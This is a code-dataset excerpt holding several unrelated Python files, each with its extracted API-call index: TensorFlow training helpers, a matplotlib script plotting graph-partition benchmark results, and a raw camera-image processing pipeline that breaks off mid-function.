class_cond)\n', (10614, 10632), False, 'from ue4nlp.mahalanobis_distance import mahalanobis_distance, mahalanobis_distance_relative, mahalanobis_distance_marginal, compute_centroids, compute_covariance\n'), ((10766, 10797), 'copy.deepcopy', 'copy.deepcopy', (['model.classifier'], {}), '(model.classifier)\n', (10779, 10797), False, 'import copy\n'), ((10938, 10959), 'utils.utils_inference.is_custom_head', 'is_custom_head', (['model'], {}), '(model)\n', (10952, 10959), False, 'from utils.utils_inference import is_custom_head, unpad_features, pad_scores\n'), ((11327, 11375), 'numpy.asarray', 'np.asarray', (["[example['labels'] for example in X]"], {}), "([example['labels'] for example in X])\n", (11337, 11375), True, 'import numpy as np\n'), ((12014, 12025), 'time.time', 'time.time', ([], {}), '()\n', (12023, 12025), False, 'import time\n'), ((12391, 12491), 'numpy.log10', 'np.log10', (['(self.config.mixup.beta1 * penalty + self.config.mixup.beta2 *\n min_mahalanobis_distance)'], {}), '(self.config.mixup.beta1 * penalty + self.config.mixup.beta2 *\n min_mahalanobis_distance)\n', (12399, 12491), True, 'import numpy as np\n'), ((12834, 12845), 'time.time', 'time.time', ([], {}), '()\n', (12843, 12845), False, 'import time\n'), ((13247, 13258), 'time.time', 'time.time', ([], {}), '()\n', (13256, 13258), False, 'import time\n'), ((13381, 13392), 'time.time', 'time.time', ([], {}), '()\n', (13390, 13392), False, 'import time\n'), ((13425, 13533), 'ue4nlp.mahalanobis_distance.mahalanobis_distance', 'mahalanobis_distance', (['None', 'None', 'X_features', 'self.class_cond_centroids', 'self.class_cond_covarince', '(True)'], {}), '(None, None, X_features, self.class_cond_centroids,\n self.class_cond_covarince, True)\n', (13445, 13533), False, 'from ue4nlp.mahalanobis_distance import mahalanobis_distance, mahalanobis_distance_relative, mahalanobis_distance_marginal, compute_centroids, compute_covariance\n'), ((14421, 14463), 'ue4nlp.dropout_mc.activate_mc_dropout', 'activate_mc_dropout', (['model'], {'activate': '(False)'}), '(model, activate=False)\n', (14440, 14463), False, 'from ue4nlp.dropout_mc import DropoutMC, activate_mc_dropout, convert_to_mc_dropout\n'), ((14472, 14518), 'ue4nlp.dropconnect_mc.activate_mc_dropconnect', 'activate_mc_dropconnect', (['model'], {'activate': '(False)'}), '(model, activate=False)\n', (14495, 14518), False, 'from ue4nlp.dropconnect_mc import LinearDropConnectMC, activate_mc_dropconnect, convert_to_mc_dropconnect, hide_dropout\n'), ((14698, 14709), 'time.time', 'time.time', ([], {}), '()\n', (14707, 14709), False, 'import time\n'), ((15424, 15435), 'time.time', 'time.time', ([], {}), '()\n', (15433, 15435), False, 'import time\n'), ((1033, 1084), 'ue4nlp.dropout_mc.DropoutMC', 'DropoutMC', ([], {'p': 'ue_args.inference_prob', 'activate': '(False)'}), '(p=ue_args.inference_prob, activate=False)\n', (1042, 1084), False, 'from ue4nlp.dropout_mc import DropoutMC, activate_mc_dropout, convert_to_mc_dropout\n'), ((1754, 1795), 'utils.utils_dropout.set_last_dropconnect', 'set_last_dropconnect', (['model', 'dropout_ctor'], {}), '(model, dropout_ctor)\n', (1774, 1795), False, 'from utils.utils_dropout import set_last_dropout, get_last_dropout, set_last_dropconnect\n'), ((1804, 1834), 'ue4nlp.dropconnect_mc.hide_dropout', 'hide_dropout', (['model.classifier'], {}), '(model.classifier)\n', (1816, 1834), False, 'from ue4nlp.dropconnect_mc import LinearDropConnectMC, activate_mc_dropconnect, convert_to_mc_dropconnect, hide_dropout\n'), ((3237, 3300), 'ue4nlp.mahalanobis_distance.compute_covariance', 'compute_covariance', (['self.class_cond_centroids', 'X', 'y', 'class_cond'], {}), '(self.class_cond_centroids, X, y, class_cond)\n', (3255, 3300), False, 'from ue4nlp.mahalanobis_distance import mahalanobis_distance, mahalanobis_distance_relative, mahalanobis_distance_marginal, compute_centroids, compute_covariance\n'), ((3846, 3919), 'utils.utils_heads.ElectraClassificationHeadIdentityPooler', 'ElectraClassificationHeadIdentityPooler', (['model.classifier', 'use_activation'], {}), '(model.classifier, use_activation)\n', (3885, 3919), False, 'from utils.utils_heads import ElectraClassificationHeadIdentityPooler, BertClassificationHeadIdentityPooler, ElectraNERHeadIdentityPooler, XLNetClassificationHeadIdentityPooler\n'), ((6859, 6935), 'ue4nlp.dropconnect_mc.activate_mc_dropconnect', 'activate_mc_dropconnect', (['model'], {'activate': '(True)', 'random': 'ue_args.inference_prob'}), '(model, activate=True, random=ue_args.inference_prob)\n', (6882, 6935), False, 'from ue4nlp.dropconnect_mc import LinearDropConnectMC, activate_mc_dropconnect, convert_to_mc_dropconnect, hide_dropout\n'), ((7007, 7079), 'ue4nlp.dropout_mc.activate_mc_dropout', 'activate_mc_dropout', (['model'], {'activate': '(True)', 'random': 'ue_args.inference_prob'}), '(model, activate=True, random=ue_args.inference_prob)\n', (7026, 7079), False, 'from ue4nlp.dropout_mc import DropoutMC, activate_mc_dropout, convert_to_mc_dropout\n'), ((10383, 10446), 'ue4nlp.mahalanobis_distance.compute_covariance', 'compute_covariance', (['self.class_cond_centroids', 'X', 'y', 'class_cond'], {}), '(self.class_cond_centroids, X, y, class_cond)\n', (10401, 10446), False, 'from ue4nlp.mahalanobis_distance import mahalanobis_distance, mahalanobis_distance_relative, mahalanobis_distance_marginal, compute_centroids, compute_covariance\n'), ((10992, 11054), 'utils.utils_heads.ElectraNERHeadIdentityPooler', 'ElectraNERHeadIdentityPooler', (['model.classifier', 'use_activation'], {}), '(model.classifier, use_activation)\n', (11020, 11054), False, 'from utils.utils_heads import ElectraClassificationHeadIdentityPooler, BertClassificationHeadIdentityPooler, ElectraNERHeadIdentityPooler, XLNetClassificationHeadIdentityPooler\n'), ((11100, 11154), 'utils.utils_heads.BertClassificationHeadIdentityPooler', 'BertClassificationHeadIdentityPooler', (['model.classifier'], {}), '(model.classifier)\n', (11136, 11154), False, 'from utils.utils_heads import ElectraClassificationHeadIdentityPooler, BertClassificationHeadIdentityPooler, ElectraNERHeadIdentityPooler, XLNetClassificationHeadIdentityPooler\n'), ((14022, 14098), 'ue4nlp.dropconnect_mc.activate_mc_dropconnect', 'activate_mc_dropconnect', (['model'], {'activate': '(True)', 'random': 'ue_args.inference_prob'}), '(model, activate=True, random=ue_args.inference_prob)\n', (14045, 14098), False, 'from ue4nlp.dropconnect_mc import LinearDropConnectMC, activate_mc_dropconnect, convert_to_mc_dropconnect, hide_dropout\n'), ((14170, 14242), 'ue4nlp.dropout_mc.activate_mc_dropout', 'activate_mc_dropout', (['model'], {'activate': '(True)', 'random': 'ue_args.inference_prob'}), '(model, activate=True, random=ue_args.inference_prob)\n', (14189, 14242), False, 'from ue4nlp.dropout_mc import DropoutMC, activate_mc_dropout, convert_to_mc_dropout\n'), ((1198, 1293), 'ue4nlp.dropconnect_mc.LinearDropConnectMC', 'LinearDropConnectMC', ([], {'linear': 'linear', 'p_dropconnect': 'ue_args.inference_prob', 'activate': 'activate'}), '(linear=linear, p_dropconnect=ue_args.inference_prob,\n activate=activate)\n', (1217, 1293), False, 'from ue4nlp.dropconnect_mc import LinearDropConnectMC, activate_mc_dropconnect, convert_to_mc_dropconnect, hide_dropout\n'), ((4109, 4148), 'utils.utils_heads.XLNetClassificationHeadIdentityPooler', 'XLNetClassificationHeadIdentityPooler', ([], {}), '()\n', (4146, 4148), False, 'from utils.utils_heads import ElectraClassificationHeadIdentityPooler, BertClassificationHeadIdentityPooler, ElectraNERHeadIdentityPooler, XLNetClassificationHeadIdentityPooler\n'), ((4194, 4248), 'utils.utils_heads.BertClassificationHeadIdentityPooler', 'BertClassificationHeadIdentityPooler', (['model.classifier'], {}), '(model.classifier)\n', (4230, 4248), False, 'from utils.utils_heads import ElectraClassificationHeadIdentityPooler, BertClassificationHeadIdentityPooler, ElectraNERHeadIdentityPooler, XLNetClassificationHeadIdentityPooler\n'), ((5444, 5493), 'numpy.asarray', 'np.asarray', (["eval_results['sampled_probabilities']"], {}), "(eval_results['sampled_probabilities'])\n", (5454, 5493), True, 'import numpy as np\n'), ((12061, 12103), 'numpy.min', 'np.min', (['full_mahalanobis_distance'], {'axis': '(-1)'}), '(full_mahalanobis_distance, axis=-1)\n', (12067, 12103), True, 'import numpy as np\n'), ((12609, 12658), 'numpy.asarray', 'np.asarray', (["eval_results['sampled_probabilities']"], {}), "(eval_results['sampled_probabilities'])\n", (12619, 12658), True, 'import numpy as np\n'), ((2014, 2069), 'ue4nlp.dropout_mc.convert_to_mc_dropout', 'convert_to_mc_dropout', (['model', "{'Dropout': dropout_ctor}"], {}), "(model, {'Dropout': dropout_ctor})\n", (2035, 2069), False, 'from ue4nlp.dropout_mc import DropoutMC, activate_mc_dropout, convert_to_mc_dropout\n'), ((5143, 5188), 'numpy.argmin', 'np.argmin', (['full_mahalanobis_distance'], {'axis': '(-1)'}), '(full_mahalanobis_distance, axis=-1)\n', (5152, 5188), True, 'import numpy as np\n'), ((12263, 12308), 'numpy.argmin', 'np.argmin', (['full_mahalanobis_distance'], {'axis': '(-1)'}), '(full_mahalanobis_distance, axis=-1)\n', (12272, 12308), True, 'import numpy as np\n')]
import os import errno import numpy as np import tensorflow as tf def create_path(path): """Create path if not exist""" try: os.makedirs(path) except OSError as exception: if exception.errno != errno.EEXIST: raise def conv_layer(name, input_tensor, ksize, num_out_channels, keep_prob, random_state, max_pool=False): input_channels = input_tensor.shape.as_list()[-1] conv_filter = tf.get_variable( '{}_filter'.format(name), [ksize[0], ksize[0], input_channels, num_out_channels], tf.float32, tf.truncated_normal_initializer) conv = tf.nn.conv2d(input_tensor, conv_filter, [1, 1, 1, 1], 'SAME', name=name) conv_relu = tf.nn.relu(conv, '{}_relu'.format(name)) if max_pool: conv_maxpool = tf.nn.max_pool( conv_relu, [1, 2, 2, 1], [1, 2, 2, 1], 'SAME', name='{}_maxpool'.format(name)) conv_dropout = tf.nn.dropout(conv_maxpool, keep_prob, seed=random_state, name='{}_dropout'.format(name)) return conv_dropout conv_dropout = tf.nn.dropout(conv_relu, keep_prob, seed=random_state, name='{}_dropout'.format(name)) return conv_dropout def train_val_split(train_mtx, label_arr, random_state, train_proportion=0.8): np.random.seed(random_state) num_train_rows = np.round(train_mtx.shape[0] * train_proportion).astype(int) rows_selected = np.random.choice(train_mtx.shape[0], num_train_rows, replace=False) rows_not_selected = list( set(range(train_mtx.shape[0])) - set(rows_selected)) return (train_mtx[rows_selected], train_mtx[rows_not_selected], label_arr[rows_selected], label_arr[rows_not_selected]) class Dataset(): def __init__(self, X, y): self.X = X.copy() self.y = y.copy() class BatchManager(): def __init__(self, train_set, num_epochs, shuffle, random_state): """ train_set, val_set: RNNDataset instances """ self.train_set = train_set self.num_epochs = num_epochs self.shuffle = shuffle self.random_state = random_state self.current_epoch = 0 self.rows_in_batch = [] def next_batch(self, batch_size): """ Output next batch as (X, y), return None if ran over num_epochs """ num_rows = self.train_set.X.shape[0] while len(self.rows_in_batch) < batch_size: self.current_epoch += 1 row_nums = list(range(num_rows)) if self.shuffle: np.random.seed(self.random_state) np.random.shuffle(row_nums) self.rows_in_batch += row_nums selected_X = self.train_set.X[self.rows_in_batch[:batch_size]] selected_y = self.train_set.y[self.rows_in_batch[:batch_size]] self.rows_in_batch = self.rows_in_batch[batch_size:] if self.current_epoch > self.num_epochs: return None return selected_X, selected_y
[ "numpy.random.seed", "os.makedirs", "tensorflow.nn.conv2d", "numpy.random.choice", "numpy.round", "numpy.random.shuffle" ]
[((616, 688), 'tensorflow.nn.conv2d', 'tf.nn.conv2d', (['input_tensor', 'conv_filter', '[1, 1, 1, 1]', '"""SAME"""'], {'name': 'name'}), "(input_tensor, conv_filter, [1, 1, 1, 1], 'SAME', name=name)\n", (628, 688), True, 'import tensorflow as tf\n'), ((1251, 1279), 'numpy.random.seed', 'np.random.seed', (['random_state'], {}), '(random_state)\n', (1265, 1279), True, 'import numpy as np\n'), ((1381, 1448), 'numpy.random.choice', 'np.random.choice', (['train_mtx.shape[0]', 'num_train_rows'], {'replace': '(False)'}), '(train_mtx.shape[0], num_train_rows, replace=False)\n', (1397, 1448), True, 'import numpy as np\n'), ((142, 159), 'os.makedirs', 'os.makedirs', (['path'], {}), '(path)\n', (153, 159), False, 'import os\n'), ((1301, 1348), 'numpy.round', 'np.round', (['(train_mtx.shape[0] * train_proportion)'], {}), '(train_mtx.shape[0] * train_proportion)\n', (1309, 1348), True, 'import numpy as np\n'), ((2549, 2582), 'numpy.random.seed', 'np.random.seed', (['self.random_state'], {}), '(self.random_state)\n', (2563, 2582), True, 'import numpy as np\n'), ((2599, 2626), 'numpy.random.shuffle', 'np.random.shuffle', (['row_nums'], {}), '(row_nums)\n', (2616, 2626), True, 'import numpy as np\n')]
#! /usr/bin/env python ################################################################################# # File Name : IPADS_GraphX_Plot_Partition_2.py # Created By : xd # Creation Date : [2014-08-14 22:09] # Last Modified : [2014-08-14 22:11] # Description : new partition plot to concern only about data ################################################################################# #!/usr/bin/env python import numpy as np import matplotlib.pyplot as plt import matplotlib.cm as cm def IPADS_GraphX_Plot( data, ngroup, label, filename, xlabel, ylabel, title, xticks, legendPos, legendNcol ): plt.clf() # Clear figure N = ngroup step = len(data) / N ind = np.arange(N) # the x locations for the groups width = 0.1 # the width of the bars: can also be len(x) sequence for i in range(0, step): if i<len(label): plt.bar(ind+i*width, data[i::step], width, color=cm.Paired(1.0/(i+1)), label=label[i]) else: plt.bar(ind+i*width, data[i::step], width, color=cm.Paired(1.0/(i+1))) plt.ylabel(ylabel) plt.xlabel(xlabel) plt.title(title) plt.xticks(ind + 2 * width, xticks) plt.legend(loc=legendPos, ncol=legendNcol) # plt.show() plt.savefig(filename) filename = "9.png" data = [146559, 101280, 93529, 139790, 132659, 139120, 108985, 133896, 154567, 153680, 182312, 232833, 192383, 194857, 280573, 417558, 361235, 308501] label = ["Hybrid(100)", "Hybrid(30)", "Edge2D", "Edge1D", "Random", "CanonicalRandom"] xlabel = 'Execution Time (second)' ylabel = 'Number of Partitions' title = 'Execution Time (in-2.0-1m V1000000 E8179662)' xticks = ('16', '25', '48') legendPos = "upper left" legendNcol = 2 ngroup = 3 # convert unit data = map(lambda x: x/1000.0, data) IPADS_GraphX_Plot( data = data, ngroup = ngroup, label = label, filename = filename, xlabel = xlabel, ylabel = ylabel, title = title, xticks = xticks, legendPos = legendPos, legendNcol = legendNcol, ) filename = "10.png" data = [4.21914028911, 3.7368692711, 4.85803910642, 3.75580013086, 6.10288873181, 5.54774338168, 4.645440915, 4.17718818837, 4.31699997602, 5.38391002532, 7.15146857475, 6.36269531228, 5.12988273555, 4.75113421863, 5.18381478864, 5.9121127584, 8.46766006671, 7.35200459511] label = ["Hybrid(100)", "Hybrid(30)", "Edge2D", "Edge1D", "Random", "CanonicalRandom"] xlabel = '# of Partitions' ylabel = 'Replication Factor' title = 'Replication Factor by # of Partitions (web-google-single V875713 E5105039)' xticks = ('16', '25', '48') legendPos = "upper left" legendNcol = 3 ngroup = 3 IPADS_GraphX_Plot( data = data, ngroup = ngroup, label = label, filename = filename, xlabel = xlabel, ylabel = ylabel, title = title, xticks = xticks, legendPos = legendPos, legendNcol = legendNcol, ) filename = "11.png" data = [103, 105, 23, 23, 23, 22, 104, 105, 22, 21, 22, 22, 103, 103, 23, 22, 23, 22] label = ["Hybrid(100)", "Hybrid(30)", "Edge2D", "Edge1D", "Random", "CanonicalRandom"] xlabel = '# of Partitions' ylabel = 'Ingress Time (ms)' title = 'Ingress Time by # of Partitions (web-google-single V875713 E5105039)' xticks = ('16', '25', '48') legendPos = "upper left" legendNcol = 3 ngroup = 3 IPADS_GraphX_Plot( data = data, ngroup = ngroup, label = label, filename = filename, xlabel = xlabel, ylabel = ylabel, title = title, xticks = xticks, legendPos = legendPos, legendNcol = legendNcol, ) xlabel = '# of Partitions' ylabel = 'stdev of vertices' title = 'stdev of vertices by # of Partitions (web-google-single V875713 E5105039)' filename = "12.png" data = [1488.6714085, 753.544123521, 4227.30253826, 30134.8904464, 512.89786005, 642.786800653, 1243.13596746, 728.884052233, 19262.1185923, 5564.88385503, 436.401272225, 475.143767717, 1009.6037415, 573.291372919, 10666.0414354, 3999.63980127, 458.58901959, 422.537800331] label = ["Hybrid(100)", "Hybrid(30)", "Edge2D", "Edge1D", "Random", "CanonicalRandom"] xticks = ('16', '25', '48') legendPos = "upper left" legendNcol = 3 ngroup = 3 IPADS_GraphX_Plot( data = data, ngroup = ngroup, label = label, filename = filename, xlabel = xlabel, ylabel = ylabel, title = title, xticks = xticks, legendPos = legendPos, legendNcol = legendNcol, ) xlabel = '# of Partitions' ylabel = 'stdev of edges' title = 'stdev of edges by # of Partitions (web-google-single V875713 E5105039)' filename = "13.png" data = [2325.52199701, 1320.9993598, 7603.45404626, 2690.44774314, 607.542536448, 883.859326247, 1811.85158509, 1414.91908122, 3366.48905633, 7993.1149977, 484.047194393, 511.027285377, 1335.58608373, 828.842050936, 15417.097578, 4812.01482182, 350.905108825, 377.629861195] label = ["Hybrid(100)", "Hybrid(30)", "Edge2D", "Edge1D", "Random", "CanonicalRandom"] xticks = ('16', '25', '48') legendPos = "upper left" legendNcol = 3 ngroup = 3 IPADS_GraphX_Plot( data = data, ngroup = ngroup, label = label, filename = filename, xlabel = xlabel, ylabel = ylabel, title = title, xticks = xticks, legendPos = legendPos, legendNcol = legendNcol, ) # xlabel = '# of Partitions' # ylabel = '(max-min)/avg of vertices' # title = '(max-min)/avg of vertices by # of Partitions (web-google-single V875713 E5105039)' # # xlabel = '# of Partitions' # ylabel = '(max-min)/avg of edges' # title = '(max-min)/avg of edges by # of Partitions (web-google-single V875713 E5105039)' # xlabel = '# of Partitions' ylabel = 'Replication Factor' title = 'Replication Factor by # of Partitions (soc-LiveJournal1 V4847571 E68993773)' xlabel = '# of Partitions' ylabel = 'stdev of vertices' title = 'stdev of vertices by # of Partitions (soc-LiveJournal1 V4847571 E68993773)' xlabel = '# of Partitions' ylabel = 'stdev of edges' title = 'stdev of edges by # of Partitions (soc-LiveJournal1 V4847571 E68993773)' xlabel = '# of Partitions' ylabel = 'Replication Factor' title = 'Replication Factor by # of Partitions (soc-LiveJournal1 V4847571 E68993773)' filename = "14.png" data = [5.83256150348, 5.00636483715, 4.45356055641, 6.24904844096, 7.71010450388, 6.37401659512, 6.98455246968, 6.06394728411, 5.29022081368, 7.61019549791, 9.8903190897, 7.86495092078, 8.60331885804, 7.72158282983, 6.72133033224, 9.57859781734, 13.4800690903, 10.1176783177] label = ["Hybrid(100)", "Hybrid(30)", "Edge2D", "Edge1D", "Random", "CanonicalRandom"] xticks = ('16', '25', '48') legendPos = "upper left" legendNcol = 3 ngroup = 3 IPADS_GraphX_Plot( data = data, ngroup = ngroup, label = label, filename = filename, xlabel = xlabel, ylabel = ylabel, title = title, xticks = xticks, legendPos = legendPos, legendNcol = legendNcol, ) xlabel = '# of Partitions' ylabel = 'stdev of vertices' title = 'stdev of vertices by # of Partitions (soc-LiveJournal1 V4847571 E68993773)' filename = "15.png" data = [1811.74003033, 1081.50691854, 290124.794151, 2445.98116497, 736.076632283, 731.045901004, 1711.13733125, 1208.98552514, 197679.735597, 3380.31018837, 924.754561167, 1134.14999784, 2296.44804677, 1286.57201168, 96026.7101455, 4257.20150275, 809.257504342, 778.212022131] label = ["Hybrid(100)", "Hybrid(30)", "Edge2D", "Edge1D", "Random", "CanonicalRandom"] xticks = ('16', '25', '48') legendPos = "upper left" legendNcol = 3 ngroup = 3 IPADS_GraphX_Plot( data = data, ngroup = ngroup, label = label, filename = filename, xlabel = xlabel, ylabel = ylabel, title = title, xticks = xticks, legendPos = legendPos, legendNcol = legendNcol, ) xlabel = '# of Partitions' ylabel = 'stdev of edges' title = 'stdev of edges by # of Partitions (soc-LiveJournal1 V4847571 E68993773)' filename = "16.png" data = [9023.28625847, 9919.2555556, 19606.060674, 15191.7761438, 2424.12069674, 3144.04383754, 8524.25111277, 9485.00318575, 16107.8162292, 16489.4759357, 1886.11609229, 2797.04864341, 6773.90225036, 6602.12176671, 209703.384542, 12262.679599, 1090.59982998, 1621.1235011] label = ["Hybrid(100)", "Hybrid(30)", "Edge2D", "Edge1D", "Random", "CanonicalRandom"] xticks = ('16', '25', '48') legendPos = "upper left" legendNcol = 3 ngroup = 3 IPADS_GraphX_Plot( data = data, ngroup = ngroup, label = label, filename = filename, xlabel = xlabel, ylabel = ylabel, title = title, xticks = xticks, legendPos = legendPos, legendNcol = legendNcol, )
[ "matplotlib.pyplot.title", "matplotlib.cm.Paired", "matplotlib.pyplot.clf", "matplotlib.pyplot.legend", "numpy.arange", "matplotlib.pyplot.xticks", "matplotlib.pyplot.ylabel", "matplotlib.pyplot.xlabel", "matplotlib.pyplot.savefig" ]
[((693, 702), 'matplotlib.pyplot.clf', 'plt.clf', ([], {}), '()\n', (700, 702), True, 'import matplotlib.pyplot as plt\n'), ((768, 780), 'numpy.arange', 'np.arange', (['N'], {}), '(N)\n', (777, 780), True, 'import numpy as np\n'), ((1147, 1165), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['ylabel'], {}), '(ylabel)\n', (1157, 1165), True, 'import matplotlib.pyplot as plt\n'), ((1170, 1188), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['xlabel'], {}), '(xlabel)\n', (1180, 1188), True, 'import matplotlib.pyplot as plt\n'), ((1193, 1209), 'matplotlib.pyplot.title', 'plt.title', (['title'], {}), '(title)\n', (1202, 1209), True, 'import matplotlib.pyplot as plt\n'), ((1214, 1249), 'matplotlib.pyplot.xticks', 'plt.xticks', (['(ind + 2 * width)', 'xticks'], {}), '(ind + 2 * width, xticks)\n', (1224, 1249), True, 'import matplotlib.pyplot as plt\n'), ((1254, 1296), 'matplotlib.pyplot.legend', 'plt.legend', ([], {'loc': 'legendPos', 'ncol': 'legendNcol'}), '(loc=legendPos, ncol=legendNcol)\n', (1264, 1296), True, 'import matplotlib.pyplot as plt\n'), ((1319, 1340), 'matplotlib.pyplot.savefig', 'plt.savefig', (['filename'], {}), '(filename)\n', (1330, 1340), True, 'import matplotlib.pyplot as plt\n'), ((1007, 1031), 'matplotlib.cm.Paired', 'cm.Paired', (['(1.0 / (i + 1))'], {}), '(1.0 / (i + 1))\n', (1016, 1031), True, 'import matplotlib.cm as cm\n'), ((1120, 1144), 'matplotlib.cm.Paired', 'cm.Paired', (['(1.0 / (i + 1))'], {}), '(1.0 / (i + 1))\n', (1129, 1144), True, 'import matplotlib.cm as cm\n')]
# -*- coding: utf-8 -*- import numpy as np from chainercv.visualizations import vis_bbox as chainer_vis_bbox def vis_bbox(img, bbox, label=None, score=None, label_names=None, ax=None): """A wrapper of chainer function for visualizing bbox inside image. Args: img (~torch.tensor): an image which shape :math:`(3, H, W)` and format RGB [0.0, 1.0] bbox (~torch.tensor): bounding boxes we want to show. Its shape is :math:`(N, 4)` and format is :math:`(x_\\mathrm{min}, y_\\mathrm{min}, \ x_\\mathrm{max}, y_\\mathrm{max})` label (~torch.tensor): labels of each bbox score (~torch.tensor): scores of each bbox label_names (iterable of strings): Name of labels ordered according to label ids. If this is `None`, labels will be skipped. """ return chainer_vis_bbox(np.uint8(img * 255), bbox[:, [1, 0, 3, 2]], label=label, score=score, label_names=label_names, ax=ax)
[ "numpy.uint8" ]
[((915, 934), 'numpy.uint8', 'np.uint8', (['(img * 255)'], {}), '(img * 255)\n', (923, 934), True, 'import numpy as np\n')]
import os import os.path as osp import yaml from operator import concat, sub from utils.raw_utils import convert,scale,diff from utils.io import imread, imwrite,get_exif,get_trip,raw2rgbg,mdwrite,raw_read_rgb,check_exif,extract_exif from utils.isp import rgbg2linref, rgbg2srgb,rgbg2rgb from utils.path import be,bj,mkdir from multiprocessing import Pool, RawArray import matplotlib.pyplot as plt import os import os.path as osp import pandas as pd import numpy as np import exifread import imageio import rawpy import cv2 as cv from glob import glob from glob import glob from utils.io import parse_tripr subdirs=['huawei_20200918', 'huawei_20200910', 'huawei_20200826', 'huawei_20200909', 'huawei_20200917','nikon_20200616', 'nikon_20200617'] def get_trips(): for input_folder in subdirs: df=parse_tripr(input_folder) df.to_csv(osp.join(input_folder,'trip.csv'),index=False) bsd=None def get5rgb(inputs,outputs,black_level=256): """inputs: ref, ab, f outputs: ref, ab, f, fo, tran""" check_exif(inputs) rgbs=[raw_read_rgb(x) for x in inputs] h,w,c=rgbs[0].shape for out,rgb in zip(outputs[:3],rgbs): imwrite(out,rgb) # return raws=[rawpy.imread(x) for x in inputs[1:3]] raws[1].raw_image_visible[:] = np.maximum(raws[1].raw_image_visible.astype(np.int64) - raws[0].raw_image_visible.astype(np.int64) + black_level,0).astype(np.uint16) fo = cv.resize(raws[1].postprocess(use_camera_wb=True,no_auto_bright=True),None,fx=0.5,fy=0.5) imwrite(outputs[3],fo) raws=[rawpy.imread(x) for x in inputs[:2]] raws[1].raw_image_visible[:] = np.maximum(raws[1].raw_image_visible.astype(np.int64) - raws[0].raw_image_visible.astype(np.int64) + black_level,0).astype(np.uint16) tran = cv.resize(raws[1].postprocess(use_camera_wb=True,no_auto_bright=True),None,fx=0.5,fy=0.5) imwrite(outputs[4],tran) def batch5rgb(root:str,processes=16): df=get_trip(root) dfi=df.applymap(lambda x:osp.join(root,'raw',x+'.dng')).to_numpy() out_dirs=[osp.join(root,'rgb','origin'),osp.join(root,'rgb','derived')] for d in out_dirs: mkdir(d) dfo=df.applymap(lambda x:osp.join(out_dirs[0],x+'.jpg')) dfo[["fo","m"]]=df[["f","ab"]].applymap( lambda x:osp.join(out_dirs[1],x+'.jpg')) dfo=dfo.to_numpy() # get5rgb(dfi[0],dfo[0]) # return with Pool(16) as p: ares = p.starmap_async(get5rgb, zip(dfi,dfo)) ares.wait() def concat_bbs(root): dfbd=pd.read_csv(osp.join(root,root+'.csv')) dftrip=pd.read_csv(osp.join(root,'trip.csv')) dfbb=pd.concat([dftrip,dfbd],axis=1) dfbb.to_csv(osp.join(root,'bb.csv'),index=False) from pprint import pformat def exif_dbg(): path="nikon_20200616/raw/DSC_7550.NEF" a=get_exif(path) with open("exifnk.yaml",'w')as f: f.write(pformat(a)) def tbnail_rgb(inputs,outputs): r=1/16 for i,o in zip(inputs,outputs): im=cv.imread(i) if im is None: print(i) continue # print(im.shape,im.dtype) cv.imwrite(o,cv.resize(im,None,fx=r,fy=r)) def batch_rgbtb(root,fmt='rgbc'): df=get_trip(root) in_dirs=[osp.join(root,fmt,'origin'),osp.join(root,fmt,'derived')] dfi=df.applymap(lambda x:osp.join(in_dirs[0],x+'.jpg')) dfi[["fo","m"]]=df[["f","ab"]].applymap( lambda x:osp.join(in_dirs[1],x+'.jpg')) dfi=dfi.to_numpy() out_dirs=[osp.join(root,fmt,'thumbnail','origin'),osp.join(root,fmt,'thumbnail','derived')] for d in out_dirs: mkdir(d) dfo=df.applymap(lambda x:osp.join(out_dirs[0],x+'.jpg')) dfo[["fo","m"]]=df[["f","ab"]].applymap( lambda x:osp.join(out_dirs[1],x+'.jpg')) dfo=dfo.to_numpy() with Pool(16) as p: ares = p.starmap_async(tbnail_rgb, zip(dfi,dfo)) ares.wait() def five(root,imformat='rgb'): df=get_trip(root) out_dirs=[osp.join(imformat,'thumbnail','origin'),osp.join(imformat,'thumbnail','derived')] dfo=df.applymap(lambda x:f"![{x}]({osp.join(out_dirs[0],x+'.jpg')})") dfo[["fo","m"]]=df[["f","ab"]].applymap( lambda x:f"![{x}]({osp.join(out_dirs[1],x+'.jpg')})") mdwrite(osp.join(root,f'five{imformat}.md'),dfo) def crop_rgb(inputs,outputs,bds): w_start, h_start,w_end, h_end =[int(x) for x in bds[:4]] # print(h_start, w_start, h_end, w_end) h_offset = (h_end-h_start)//32 * 32 w_offset = (w_end-w_start)//32 * 32 for i,o in zip(inputs,outputs): img=cv.imread(i) # img=cv.resize(img,None,fx=0.5,fy=0.5) cv.imwrite(o,img[h_start:h_start+h_offset,w_start:w_start+w_offset]) def batch_crop_rgb(root): df=get_trip(root) in_dirs=[osp.join(root,'rgb','origin'),osp.join(root,'rgb','derived')] dfi=df.applymap(lambda x:osp.join(in_dirs[0],x+'.jpg')) dfi[["fo","m"]]=df[["f","ab"]].applymap( lambda x:osp.join(in_dirs[1],x+'.jpg')) dfi=dfi.to_numpy() out_dirs=[osp.join(root,'rgbc','origin'),osp.join(root,'rgbc','derived')] for d in out_dirs: mkdir(d) dfo=df.applymap(lambda x:osp.join(out_dirs[0],x+'.jpg')) dfo[["fo","m"]]=df[["f","ab"]].applymap( lambda x:osp.join(out_dirs[1],x+'.jpg')) dfo=dfo.to_numpy() dfbd=(pd.read_csv(osp.join(root,root+'.csv'))[["w1","h1","w2","h2"]]).to_numpy() # print(dfi[50]) # crop_rgb(dfi[50],dfo[50],dfbd[50]) # return with Pool(16) as p: ares = p.starmap_async(crop_rgb, zip(dfi,dfo,dfbd)) ares.wait() def tbnail_raw(inputs,outputs): r=1/16 imgs=[cv.resize(rgbg2srgb(imread(x),maximum=65535),None,fx=r,fy=r) for x in inputs[:5]] for img,o in zip(imgs,outputs[:5]): imwrite(o,img) def batch_rawtb(root): df=get_trip(root) in_dirs=[osp.join(root,'rawc','origin'),osp.join(root,'rawc','derived')] dfi=df.applymap(lambda x:osp.join(in_dirs[0],x+'.png')) dfi[["fo","m"]]=df[["f","ab"]].applymap( lambda x:osp.join(in_dirs[1],x+'.png')) dfi=dfi.to_numpy() out_dirs=[osp.join(root,'rawc','thumbnail','origin'),osp.join(root,'rawc','thumbnail','derived')] for d in out_dirs: mkdir(d) dfo=df.applymap(lambda x:osp.join(out_dirs[0],x+'.jpg')) dfo[["fo","m"]]=df[["f","ab"]].applymap( lambda x:osp.join(out_dirs[1],x+'.jpg')) dfo=dfo.to_numpy() with Pool(16) as p: ares = p.starmap_async(tbnail_raw, zip(dfi,dfo)) ares.wait() def get5rawc(inputs,outputs,bds): """inputs: 